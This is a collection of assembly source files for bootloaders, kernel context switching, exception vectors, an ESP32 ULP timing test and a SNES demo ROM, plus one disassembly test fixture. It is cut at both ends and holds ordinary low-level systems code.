boot_pgt2:
.fill 512, 8, 0
|
moehr1z/loader | 1,619 | src/arch/aarch64/entry.s | // Adapted from https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/02_runtime_init/src/_arch/aarch64/cpu/boot.s
.equ _core_id_mask, 0xff
.section .text._start
_start:
// Only proceed on the boot core. Park it otherwise.
mrs x1, mpidr_el1
and x1, x1, _core_id_mask
mov x2, xzr // Assume CPU 0 is responsible for booting
cmp x1, x2
b.ne 1f
// If execution reaches here, it is the boot core. Now, prepare the jump to Rust code.
// This loads the physical address of the stack end. For details see
// https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/16_virtual_mem_part4_higher_half_kernel/src/bsp/raspberrypi/link.ld
adrp x4, __boot_core_stack_end_exclusive
add x4, x4, #:lo12:__boot_core_stack_end_exclusive
mov sp, x4
// Jump to Rust code.
b _start_rust
// Infinitely wait for events (aka "park the core").
1: wfe
b 1b
.size _start, . - _start
.type _start, function
.global _start
.section .bss
.global l0_pgtable
.global l1_pgtable
.global l2_pgtable
.global l2k_pgtable
.global l3_pgtable
.global L0mib_pgtable
.align 12
l0_pgtable:
.space 512*8, 0
l1_pgtable:
.space 512*8, 0
l2_pgtable:
.space 512*8, 0
l2k_pgtable:
.space 512*8, 0
l3_pgtable:
.space 512*8, 0
L0mib_pgtable:
.space 512*8, 0
L2mib_pgtable:
.space 512*8, 0
L4mib_pgtable:
.space 512*8, 0
L6mib_pgtable:
.space 512*8, 0
L8mib_pgtable:
.space 512*8, 0
L10mib_pgtable:
.space 512*8, 0
L12mib_pgtable:
.space 512*8, 0
L14mib_pgtable:
.space 512*8, 0
L16mib_pgtable:
.space 512*8, 0
L18mib_pgtable:
.space 512*8, 0 |
moehr1z/hermit-rs | 3,451 | kernel/src/arch/riscv64/kernel/switch.s | .section .text
.global switch_to_task
.global task_start
.extern task_entry
// .extern set_current_kernel_stack
.align 16
// This function should only be called if the fp registers are clean
switch_to_task:
// a0 = old_stack => the address to store the old rsp
// a1 = new_stack => stack pointer of the new task
addi sp, sp, -(31*8)
sd x31, (8*30)(sp)
sd x30, (8*29)(sp)
sd x29, (8*28)(sp)
sd x28, (8*27)(sp)
sd x27, (8*26)(sp)
sd x26, (8*25)(sp)
sd x25, (8*24)(sp)
sd x24, (8*23)(sp)
sd x23, (8*22)(sp)
sd x22, (8*21)(sp)
sd x21, (8*20)(sp)
sd x20, (8*19)(sp)
sd x19, (8*18)(sp)
sd x18, (8*17)(sp)
sd x17, (8*16)(sp)
sd x16, (8*15)(sp)
sd x15, (8*14)(sp)
sd x14, (8*13)(sp)
sd x13, (8*12)(sp)
sd x12, (8*11)(sp)
sd x11, (8*10)(sp)
sd x10, (8*9)(sp)
sd x9, (8*8)(sp)
sd x8, (8*7)(sp)
sd x7, (8*6)(sp)
sd x6, (8*5)(sp)
sd x5, (8*4)(sp)
sd x4, (8*3)(sp)
//sd x3, (8*2)(sp)
//sd x2, (8*1)(sp)
sd x1, (8*0)(sp)
//Store floating point registers
//TODO: Save only when changed
# fsd f0, (8*31)(sp)
# fsd f1, (8*32)(sp)
# fsd f2, (8*33)(sp)
# fsd f3, (8*34)(sp)
# fsd f4, (8*35)(sp)
# fsd f5, (8*36)(sp)
# fsd f6, (8*37)(sp)
# fsd f7, (8*38)(sp)
# fsd f8, (8*39)(sp)
# fsd f9, (8*40)(sp)
# fsd f10, (8*41)(sp)
# fsd f11, (8*42)(sp)
# fsd f12, (8*43)(sp)
# fsd f13, (8*44)(sp)
# fsd f14, (8*45)(sp)
# fsd f15, (8*46)(sp)
# fsd f16, (8*47)(sp)
# fsd f17, (8*48)(sp)
# fsd f18, (8*49)(sp)
# fsd f19, (8*50)(sp)
# fsd f20, (8*51)(sp)
# fsd f21, (8*52)(sp)
# fsd f22, (8*53)(sp)
# fsd f23, (8*54)(sp)
# fsd f24, (8*55)(sp)
# fsd f25, (8*56)(sp)
# fsd f26, (8*57)(sp)
# fsd f27, (8*58)(sp)
# fsd f28, (8*59)(sp)
# fsd f29, (8*60)(sp)
# fsd f30, (8*61)(sp)
# fsd f31, (8*62)(sp)
# frcsr t0
# sd t0, (8*63)(sp)
// Store current stack pointer with saved context in `_dst`.
sd sp, (0)(a0)
// Set stack pointer to supplied `_src`.
mv sp, a1
//set current kernel stack
call set_current_kernel_stack
# // Restore fp regs
# fld f0, (8*31)(sp)
# fld f1, (8*32)(sp)
# fld f2, (8*33)(sp)
# fld f3, (8*34)(sp)
# fld f4, (8*35)(sp)
# fld f5, (8*36)(sp)
# fld f6, (8*37)(sp)
# fld f7, (8*38)(sp)
# fld f8, (8*39)(sp)
# fld f9, (8*40)(sp)
# fld f10, (8*41)(sp)
# fld f11, (8*42)(sp)
# fld f12, (8*43)(sp)
# fld f13, (8*44)(sp)
# fld f14, (8*45)(sp)
# fld f15, (8*46)(sp)
# fld f16, (8*47)(sp)
# fld f17, (8*48)(sp)
# fld f18, (8*49)(sp)
# fld f19, (8*50)(sp)
# fld f20, (8*51)(sp)
# fld f21, (8*52)(sp)
# fld f22, (8*53)(sp)
# fld f23, (8*54)(sp)
# fld f24, (8*55)(sp)
# fld f25, (8*56)(sp)
# fld f26, (8*57)(sp)
# fld f27, (8*58)(sp)
# fld f28, (8*59)(sp)
# fld f29, (8*60)(sp)
# fld f30, (8*61)(sp)
# fld f31, (8*62)(sp)
# ld t0, (8*63)(sp)
# fscsr t0
// Restore context
ld x1, (8*0)(sp)
//ld x2, (8*1)(sp)
//ld x3, (8*2)(sp)
ld x4, (8*3)(sp)
ld x5, (8*4)(sp)
ld x6, (8*5)(sp)
ld x7, (8*6)(sp)
ld x8, (8*7)(sp)
ld x9, (8*8)(sp)
ld x10, (8*9)(sp)
ld x11, (8*10)(sp)
ld x12, (8*11)(sp)
ld x13, (8*12)(sp)
ld x14, (8*13)(sp)
ld x15, (8*14)(sp)
ld x16, (8*15)(sp)
ld x17, (8*16)(sp)
ld x18, (8*17)(sp)
ld x19, (8*18)(sp)
ld x20, (8*19)(sp)
ld x21, (8*20)(sp)
ld x22, (8*21)(sp)
ld x23, (8*22)(sp)
ld x24, (8*23)(sp)
ld x25, (8*24)(sp)
ld x26, (8*25)(sp)
ld x27, (8*26)(sp)
ld x28, (8*27)(sp)
ld x29, (8*28)(sp)
ld x30, (8*29)(sp)
ld x31, (8*30)(sp)
addi sp, sp, (31*8)
ret
.align 16
task_start:
mv sp, a2
j task_entry
|
moehr1z/hermit-rs | 4,619 | kernel/src/arch/x86_64/kernel/boot.s | # This is the entry point for the application processors.
# It is loaded at 0x8000 by Hermit and filled with parameters.
# It does the switch from Real Mode -> Protected Mode -> Long Mode,
# sets up CR3 for this CPU, and then calls into _start.
#
# In contrast to this self-contained entry point, _start is linked
# to the rest of Hermit and thus has access to all exported symbols
# (like the actual Rust entry point).
.intel_syntax noprefix
.set CR0_PG, 1 << 31
.set CR4_PAE, 1 << 5
.set MSR_EFER, 0xC0000080
.set EFER_LME, 1 << 8
.set EFER_NXE, 1 << 11
.code16
.section .text
.global _start
_start:
jmp _rmstart
# PARAMETERS
.align 8
entry_point: .8byte 0xDEADC0DE
cpu_id: .4byte 0xC0DECAFE
boot_info: .8byte 0xBEEFBEEF
pml4: .4byte 0xDEADBEEF
pad: .4byte 0
_rmstart:
cli
lgdt [gdtr]
# switch to protected mode by setting PE bit
mov eax, cr0
or al, 0x1
mov cr0, eax
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# far jump to the 32bit code
ljmpl $codesel, $_pmstart
.intel_syntax noprefix
.code32
.align 4
_pmstart:
xor eax, eax
mov ax, OFFSET datasel
mov ds, eax
mov es, eax
mov fs, eax
mov gs, eax
mov ss, eax
jmp short stublet
2:
jmp 2b
# GDT for the protected mode
.align 4
gdtr: # descritor table
.2byte gdt_end - gdt - 1 # limit
.4byte gdt # base address
gdt:
.8byte 0 # null descriptor
.set codesel, . - gdt
.2byte 0xFFFF # segment size 0..15
.2byte 0 # segment address 0..15
.byte 0 # segment address 16..23
.byte 0x9A # access permissions und type
.byte 0xCF # additional information and segment size 16...19
.byte 0 # segment address 24..31
.set datasel, . - gdt
.2byte 0xFFFF # segment size 0..15
.2byte 0 # segment address 0..15
.byte 0 # segment address 16..23
.byte 0x92 # access permissions and type
.byte 0xCF # additional informationen and degment size 16...19
.byte 0 # segment address 24..31
gdt_end:
.align 4
GDTR64:
.2byte GDT64_end - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
# we need a new GDT to switch in the 64bit modus
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64_end:
.align 4
stublet:
# Enable PAE mode.
mov eax, cr4
or eax, CR4_PAE
mov cr4, eax
# Set the address to PML4 in CR3.
mov eax, [pml4]
mov cr3, eax
# Enable x86-64 Compatibility Mode by setting EFER_LME.
# Also enable early access to NO_EXECUTE-protected memory through EFER_NXE.
mov ecx, MSR_EFER
rdmsr
or eax, EFER_LME | EFER_NXE
wrmsr
# Enable Paging.
mov eax, cr0
or eax, CR0_PG
mov cr0, eax
# Load the 64-bit global descriptor table.
lgdt [GDTR64]
mov ax, OFFSET GDT64.Data
mov ss, eax
mov ds, eax
mov es, eax
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmpl $GDT64.Code, $start64
.intel_syntax noprefix
.code64
.align 8
start64:
# forward address to boot info
mov rdi, [boot_info]
mov esi, [cpu_id]
# Jump to _start
jmp [entry_point]
|
moehr1z/hermit-rs | 6,784 | kernel/src/arch/aarch64/kernel/start.s | .section .text
.extern do_bad_mode
.extern do_irq
.extern do_fiq
.extern do_sync
.extern do_error
.extern get_last_stack_pointer
.macro trap_entry spsel
stp x29, x30, [sp, #-16]!
stp x27, x28, [sp, #-16]!
stp x25, x26, [sp, #-16]!
stp x23, x24, [sp, #-16]!
stp x21, x22, [sp, #-16]!
stp x19, x20, [sp, #-16]!
stp x17, x18, [sp, #-16]!
stp x15, x16, [sp, #-16]!
stp x13, x14, [sp, #-16]!
stp x11, x12, [sp, #-16]!
stp x9, x10, [sp, #-16]!
stp x7, x8, [sp, #-16]!
stp x5, x6, [sp, #-16]!
stp x3, x4, [sp, #-16]!
stp x1, x2, [sp, #-16]!
mrs x22, tpidr_el0
stp x22, x0, [sp, #-16]!
mrs x23, sp_el0
mrs x22, spsr_el1
stp x22, x23, [sp, #-16]!
mrs x23, elr_el1
mov x22, #\spsel
stp x22, x23, [sp, #-16]!
.endm
.macro trap_exit
ldp x22, x23, [sp], #16
msr elr_el1, x23
ldp x22, x23, [sp], #16
msr spsr_el1, x22
msr sp_el0, x23
ldp x22, x0, [sp], #16
msr tpidr_el0, x22
ldp x1, x2, [sp], #16
ldp x3, x4, [sp], #16
ldp x5, x6, [sp], #16
ldp x7, x8, [sp], #16
ldp x9, x10, [sp], #16
ldp x11, x12, [sp], #16
ldp x13, x14, [sp], #16
ldp x15, x16, [sp], #16
ldp x17, x18, [sp], #16
ldp x19, x20, [sp], #16
ldp x21, x22, [sp], #16
ldp x23, x24, [sp], #16
ldp x25, x26, [sp], #16
ldp x27, x28, [sp], #16
ldp x29, x30, [sp], #16
.endm
/*
* Exception vector entry
*/
.macro ventry label
.align 7
b \label
.endm
.macro invalid, reason
mov x0, sp
mov x1, #\reason
b do_bad_mode
.endm
/*
* SYNC exception handler.
*/
.align 6
el1_sync:
trap_entry 1
mov x0, sp
bl do_sync
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sync, .-el1_sync
.type el1_sync, @function
/*
* IRQ handler.
*/
.align 6
el1_irq:
trap_entry 1
mov x0, sp
bl do_irq
cmp x0, 0
b.eq 1f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
1:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_irq, .-el1_irq
.type el1_irq, @function
/*
* FIQ handler.
*/
.align 6
el1_fiq:
trap_entry 1
mov x0, sp
bl do_fiq
cmp x0, 0
b.eq 2f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
2:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_fiq, .-el1_fiq
.type el1_fiq, @function
.align 6
el1_error:
trap_entry 1
mov x0, sp
bl do_error
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_error, .-el1_error
.type el1_error, @function
/*
* SYNC exception handler with SP0.
*/
.align 6
el1_sp0_sync:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_sync
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_sync, .-el1_sp0_sync
.type el1_sp0_sync, @function
/*
* IRQ handler with SP0.
*/
.align 6
el1_sp0_irq:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_irq
cmp x0, 0
b.eq 3f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
3:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_irq, .-el1_sp0_irq
.type el1_sp0_irq, @function
/*
* FIQ handler with SP0.
*/
.align 6
el1_sp0_fiq:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_fiq
cmp x0, 0
b.eq 4f
// switch to the next task
mov x1, sp
str x1, [x0] /* store old sp */
bl get_last_stack_pointer /* get new sp */
mov sp, x0
4:
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_fiq, .-el1_sp0_fiq
.type el1_sp0_fiq, @function
.align 6
el1_sp0_error:
msr spsel, #1
trap_entry 0
mov x0, sp
bl do_error
trap_exit
eret
// speculation barrier after the ERET to prevent the CPU
// from speculating past the exception return.
dsb nsh
isb
.size el1_sp0_error, .-el1_sp0_error
.type el1_sp0_error, @function
el0_sync_invalid:
invalid 0
.type el0_sync_invalid, @function
el0_irq_invalid:
invalid 1
.type el0_irq_invalid, @function
el0_fiq_invalid:
invalid 2
.type el0_fiq_invalid, @function
el0_error_invalid:
invalid 3
.type el0_error_invalid, @function
el1_sync_invalid:
invalid 0
.type el1_sync_invalid, @function
el1_irq_invalid:
invalid 1
.type el1_irq_invalid, @function
el1_fiq_invalid:
invalid 2
.type el1_fiq_invalid, @function
el1_error_invalid:
invalid 3
.type el1_error_invalid, @function
/* start of the data section */
.section .rodata
.align 11
.global vector_table
vector_table:
/* Current EL with SP0 */
ventry el1_sp0_sync // Synchronous EL1t
ventry el1_sp0_irq // IRQ EL1t
ventry el1_sp0_fiq // FIQ EL1t
ventry el1_sp0_error // Error EL1t
/* Current EL with SPx */
ventry el1_sync // Synchronous EL1h
ventry el1_irq // IRQ EL1h
ventry el1_fiq // FIQ EL1h
ventry el1_error // Error EL1h
/* Lower EL using AArch64 */
ventry el0_sync_invalid // Synchronous 64-bit EL0
ventry el0_irq_invalid // IRQ 64-bit EL0
ventry el0_fiq_invalid // FIQ 64-bit EL0
ventry el0_error_invalid // Error 64-bit EL0
/* Lower EL using AArch32 */
ventry el0_sync_invalid // Synchronous 32-bit EL0
ventry el0_irq_invalid // IRQ 32-bit EL0
ventry el0_fiq_invalid // FIQ 32-bit EL0
ventry el0_error_invalid // Error 32-bit EL0
.size vector_table, .-vector_table
|
MohannedAhmed67/Edits | 1,766 | tests/tests_data/preprocessing/standardize_test_input_1.s |
datasets/formatted/output/ADD_1_TO_A_GIVEN_NUMBER_1.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f_gold(int)>:
f_gold(int):
0: endbr64
4: pushq %rbp
5: movq %rsp,%rbp
8: movl %edi,-0x4(%rbp)
b: movl -0x4(%rbp),%eax
e: addl $0x1,%eax
11: popq %rbp
12: retq
0000000000000013 <__static_initialization_and_destruction_0(int, int)>:
__static_initialization_and_destruction_0(int, int):
13: endbr64
17: pushq %rbp
18: movq %rsp,%rbp
1b: subq $0x10,%rsp
1f: movl %edi,-0x4(%rbp)
22: movl %esi,-0x8(%rbp)
25: cmpl $0x1,-0x4(%rbp)
29: jne 66 <__static_initialization_and_destruction_0(int, int)+0x53>
2b: cmpl $0xffff,-0x8(%rbp)
32: jne 66 <__static_initialization_and_destruction_0(int, int)+0x53>
34: leaq 0x0(%rip),%rax # 3b <__static_initialization_and_destruction_0(int, int)+0x28>
3b: movq %rax,%rdi
3e: callq 43 <__static_initialization_and_destruction_0(int, int)+0x30>
43: leaq 0x0(%rip),%rax # 4a <__static_initialization_and_destruction_0(int, int)+0x37>
4a: movq %rax,%rdx
4d: leaq 0x0(%rip),%rax # 54 <__static_initialization_and_destruction_0(int, int)+0x41>
54: movq %rax,%rsi
57: movq 0x0(%rip),%rax # 5e <__static_initialization_and_destruction_0(int, int)+0x4b>
5e: movq %rax,%rdi
61: callq 66 <__static_initialization_and_destruction_0(int, int)+0x53>
66: nop
67: leaveq
68: retq
0000000000000069 <_GLOBAL__sub_I__Z6f_goldi>:
_GLOBAL__sub_I__Z6f_goldi():
69: endbr64
6d: pushq %rbp
6e: movq %rsp,%rbp
71: movl $0xffff,%esi
76: movl $0x1,%edi
7b: callq 13 <__static_initialization_and_destruction_0(int, int)>
80: popq %rbp
81: retq
|
Molorius/ulp-speed-test | 3,790 | main/main.S |
#define HIGH() reg_wr 257, 26, 26, 1;
#define LOW() reg_wr 258, 26, 26, 1;
#define LOOPS 1024
// this does not affect any flags
#define TEST(code...) \
HIGH() \
code; \
LOW()
#define ALU_REG_TEST(ins) TEST(ins r0, r0, r0)
#define ALU_IMM_TEST(ins) TEST(ins r0, r0, 0)
#define JUMP_0F_TEST(code...) \
TEST( \
code; \
0: ; \
)
#define JUMP_R0_TEST(code...) \
move r0, 0f; \
JUMP_0F_TEST(code)
.text
.global entry
entry:
move r2, 0 // r2 should always be 0
// enable rtc_gpio12 / gpio2 for pulse
reg_wr 295, 19, 19, 1
reg_wr 295, 18, 17, 0
// set to low
LOW()
// enable output
reg_wr 260, 26, 26, 1
tests:
// check if we looped enough times
move r3, loop_count
ld r0, r3, 0 // load loop count
sub r0, r0, 1 // decrement
st r0, r3, 0 // store updated count
jump end, ov // exit if we counted enough times
move r0, 0
move r1, 0
move r2, 0
move r3, 0
// base pulse
TEST() // 0
// ALU operations among registers
ALU_REG_TEST(add) // 1
ALU_REG_TEST(sub) // 2
ALU_REG_TEST(and) // 3
ALU_REG_TEST(or) // 4
TEST(move r0, r0) // 5
ALU_REG_TEST(lsh) // 6
ALU_REG_TEST(rsh) // 7
// ALU operations with immediate
ALU_IMM_TEST(add) // 8
ALU_IMM_TEST(sub) // 9
ALU_IMM_TEST(and) // 10
ALU_IMM_TEST(or) // 11
TEST(move r0, 0) // 12
ALU_IMM_TEST(lsh) // 13
ALU_IMM_TEST(rsh) // 14
// stage counter
TEST(stage_inc 1) // 15
TEST(stage_dec 1) // 16
TEST(stage_rst) // 17
// load data
move r3, test_data
TEST(ld r0, r3, 0) // 18
// store data
TEST(st r0, r3, 0) // 19
// jump
JUMP_R0_TEST(jump r0) // 20
// jump ov with overflow
sub r0, r2, 1
JUMP_R0_TEST(jump r0, ov) // 21
// jump ov without overflow
add r0, r0, 0
JUMP_R0_TEST(jump r0, ov) // 22
// jump eq with equal
sub r0, r0, r0
JUMP_R0_TEST(jump r0, eq) // 23
// jump eq without equal
add r0, r2, 1
JUMP_R0_TEST(jump r0, eq) // 24
// jump imm
JUMP_0F_TEST(jump 0f) // 25
// jump imm ov with overflow
sub r0, r2, 1
JUMP_0F_TEST(jump 0f, ov) // 26
// jump imm ov without overflow
add r0, r0, 0
JUMP_0F_TEST(jump 0f, ov) // 27
// jump imm eq with equal
sub r0, r0, r0
JUMP_0F_TEST(jump 0f, eq) // 28
// jump imm eq without equal
add r0, r2, 1
JUMP_0F_TEST(jump 0f, eq) // 29
move r0, 5
// jumpr lt with jump
JUMP_0F_TEST(jumpr 0f, 10, lt) // 30
// jumpr lt without jump
JUMP_0F_TEST(jumpr 0f, 1, lt) // 31
// jumpr ge with jump
JUMP_0F_TEST(jumpr 0f, 1, ge) // 32
// jumpr ge without jump
JUMP_0F_TEST(jumpr 0f, 10, ge) // 33
stage_rst
stage_inc 5
// jumps le with jump
JUMP_0F_TEST(jumps 0f, 10, le) // 34
// jumps le without jump
JUMP_0F_TEST(jumps 0f, 1, le) // 35
// jumps lt with jump
JUMP_0F_TEST(jumps 0f, 10, lt) // 36
// jumps lt without jump
JUMP_0F_TEST(jumps 0f, 1, lt) // 37
// jumps ge with jump
JUMP_0F_TEST(jumps 0f, 1, ge) // 38
// jumps ge without jump
JUMP_0F_TEST(jumps 0f, 10, ge) // 39
// cannot test halt instruction
// wake up the esp32
TEST(wake) // 40
// choose the ulp's sleep timer
TEST(sleep 0) // 41
// wait for n cycles
TEST(wait 0) // 42
TEST(wait 1) // 43
TEST(wait 2) // 44
TEST(wait 10) // 45
// adc times vary by settings, not testing here
// i2c times vary, not testing here
// read from rtc register
TEST(reg_rd 257, 26, 26) // 46
// write to rtc register
TEST(HIGH()) // 47
jump tests // loop!
end:
jump end
.data
loop_count:
.int LOOPS
.bss
test_data:
.int 0
|
mp3/ccsnes | 2,932 | tests/hello_world.s | ; Simple SNES Hello World Test ROM
; This creates a minimal ROM that displays "HELLO" on screen
.include "snes.inc"
.segment "HEADER"
.byte "HELLO WORLD TEST " ; Title (21 bytes)
.byte $30 ; LoROM, FastROM
.byte $00 ; No chips
.byte $08 ; ROM size (256KB)
.byte $00 ; No RAM
.byte $00 ; Japan
.byte $33 ; Nintendo
.byte $00 ; Version
.word $0000 ; Checksum complement
.word $FFFF ; Checksum
.segment "VECTORS"
.word 0, 0 ; Native mode interrupts (unused)
.word 0, 0, 0
.word 0, 0
.word Reset ; Reset vector
.segment "CODE"
Reset:
sei ; Disable interrupts
clc ; Clear carry
xce ; Switch to native mode
rep #$30 ; 16-bit A/X/Y
; Setup stack
ldx #$1FFF
txs
; Clear registers
lda #$0000
tcd ; Direct page = 0
; Turn off screen
sep #$20 ; 8-bit A
lda #$8F
sta $2100 ; Screen off
; Setup video mode
lda #$09
sta $2105 ; Mode 1, BG3 priority
; Setup BG1 tilemap
lda #$00
sta $2107 ; BG1 tilemap at VRAM $0000
; Setup BG1 tiles
lda #$01
sta $210B ; BG1 tiles at VRAM $1000
; Clear VRAM
rep #$20
lda #$0000
sta $2116 ; VRAM address
ldx #$8000 ; Clear 32KB
ClearVRAM:
stz $2118
dex
bne ClearVRAM
; Upload font tiles
lda #$1000
sta $2116 ; VRAM address for tiles
ldx #$0000
UploadFont:
lda FontData,x
sta $2118
inx
inx
cpx #$0100 ; 16 tiles * 8 bytes each
bne UploadFont
; Write "HELLO" to tilemap
lda #$0000
sta $2116 ; VRAM address
; H
lda #$0048
sta $2118
; E
lda #$0045
sta $2118
; L
lda #$004C
sta $2118
; L
lda #$004C
sta $2118
; O
lda #$004F
sta $2118
; Turn on screen
sep #$20
lda #$0F
sta $2100 ; Screen on, full brightness
; Enable NMI
lda #$80
sta $4200
MainLoop:
wai ; Wait for interrupt
bra MainLoop
; Simple font data (partial ASCII)
FontData:
; Tile $45 - 'E'
.byte $7E, $40, $40, $7C, $40, $40, $7E, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $48 - 'H'
.byte $42, $42, $42, $7E, $42, $42, $42, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $4C - 'L'
.byte $40, $40, $40, $40, $40, $40, $7E, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $4F - 'O'
.byte $3C, $42, $42, $42, $42, $42, $3C, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00 |
mpeco/rust-os | 8,452 | bootloader/src/asm/stage2.s | .section .second_stage, "awx"
.code16
stage2_start:
mov si, offset second_stage_string
call bios_println
a20_line_enable:
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_kcontroller_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_bios_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_fast_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
jmp error_enable_a20
a20_line_enabled:
nop
get_memory_map:
xor bp, bp # used to keep count of entries
xor ebx, ebx
mov di, offset memory_map+0x4 #0x9000+0x4 = 0x9004
mov edx, 0x534D4150
mov eax, 0xE820
mov ecx, 24
mov dword ptr es:[di+20], 1 # force ACPI 3.x entry
int 0x15
jc error_memory_map # function not supported
mov edx, 0x534D4150 # register may be trashed?
cmp eax, edx
jne error_memory_map
test ebx, ebx
jz error_memory_map
jmp mm_handle_entry
mm_get_entry:
mov eax, 0xE820
mov ecx, 24
mov dword ptr es:[di+20], 1 # force ACPI 3.x entry
int 0x15
jc mm_finish # if carry is set list finished
mov edx, 0x534D4150 # register may be trashed?
mm_handle_entry:
jcxz mm_skip_entry # cx = 0 means 0 length entry
cmp cx, 20
jbe mm_handle_entry2
test dword ptr es:[di+20], 1
jz mm_skip_entry # if ignore bit is clear skip entry
mm_handle_entry2:
mov eax, es:[di+8]
or eax, es:[di+12]
jz mm_skip_entry # if length of entry is 0 skip it
inc bp
add di, 24
mm_skip_entry:
test ebx, ebx
jnz mm_get_entry # if ebx is 0 end of list
mm_finish:
mov es:[offset memory_map], bp # store entry count at start
clc # clear carry flag
vesa:
vesa_get_info:
mov ax, 0x4F00
mov di, offset vbe_info_structure
int 0x10
cmp ax, 0x4F
jne error_vbe # VBE not supported
mov si, [vbe_info_structure_video_mode_ptr] # offset
mov ax, [vbe_info_structure_video_mode_ptr+2] # segment
mov fs, ax
sub si, 2
vesa_search_mode:
add si, 2
mov cx, fs:[si]
cmp cx, 0xFFFF
je error_vbe_mode_not_found
vesa_get_mode_info:
push esi
mov ax, 0x4F01
mov di, offset vbe_mode_info_structure
int 0x10
pop esi
cmp ax, 0x4F
jne error_vbe
vesa_check_mode:
# check if bpp of mode is 24 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_bpp], 24
jne vesa_search_mode
# check if width of mode is 800 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_width], 800
jne vesa_search_mode
# check if height of mode is 600 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_height], 600
jne vesa_search_mode
# check memory model is direct color
cmp byte ptr [vbe_mode_info_structure_memory_model], 6
jne vesa_search_mode
# check if linear framebuffer bit is set
mov ax, [vbe_mode_info_structure_attributes]
test ax, 0x80
jz vesa_search_mode
vesa_set_mode:
mov bx, cx
or bx, 0x4000 # enable linear framebuffer
mov ax, 0x4F02
int 0x10
cmp ax, 0x4F
jne error_vbe
get_vga_bitmap_font:
# save segment registers
push ds
push es
# address returned in es:bp
mov ax, 0x1130
mov bh, 0x6
int 0x10
# set ds:si to bitmap fonts address
push es
pop ds
mov si, bp
# set es:di to buffer
pop es # restore es
mov di, offset vga_bitmap_font
# move dword from ds:si to es:di 1024 times (4k bytes)
mov cx, 0x400
rep movsd
# restore ds
pop ds
enter_unreal_mode:
cli
push es
lgdt [gdt_descriptor] # load global descriptor table
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# load descriptor 2 on es
mov bx, 0x10
mov es, bx
# leave protected mode
and al, 0xFE
mov cr0, eax
pop es
sti
load_kernel:
mov ax, offset kernel_loading_buffer
mov word ptr [dap_transfer_buffer], ax
mov ax, offset _binary_kernel_elf_start
mov bx, offset stage1_start
sub ax, bx
shr ax, 9 # divide by 512
mov word ptr [dap_starting_lba], ax
mov word ptr [dap_num_sectors], 1
mov edi, offset kernel_addr
# number of sectors in kernel
mov ecx, offset _binary_kernel_elf_size
add ecx, 511 # align up
shr ecx, 9 # divide by 512
load_kernel_sector:
mov si, offset dap
mov ah, 0x42
mov dl, [drive_code] # restore drive code
int 0x13
# move from buffer to destination
push ecx
mov esi, offset kernel_loading_buffer
mov ecx, 512/4
rep movsd [edi], [esi]
pop ecx
# next iteration
mov ax, [dap_starting_lba]
inc ax
mov [dap_starting_lba], ax
dec ecx
jnz load_kernel_sector
enter_protected_mode:
cli
lgdt [gdt_descriptor] # load global descriptor table
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# load descriptor 2 in segment registers
mov bx, 0x10
mov ds, bx
mov es, bx
mov ss, bx
# loads CS with 0x8 (descriptor 1 in GDT) and jumps to stage 3
ljmp 0x8, offset stage3_start
# a20 line routines:
# checks if a20 line is enabled, returns 1 on ax if so or 0 otherwise
check_a20_line:
push es
mov ax, 0xFFFF
mov es, ax
mov si, 0x500
mov di, 0x510
mov al, byte ptr ds:[si]
push ax
mov al, byte ptr es:[di]
push ax
mov byte ptr ds:[si], 0x00
mov byte ptr es:[di], 0xFF
cmp byte ptr ds:[si], 0xFF
pop ax
mov byte ptr es:[di], al
pop ax
mov byte ptr ds:[si], al
mov ax, 0
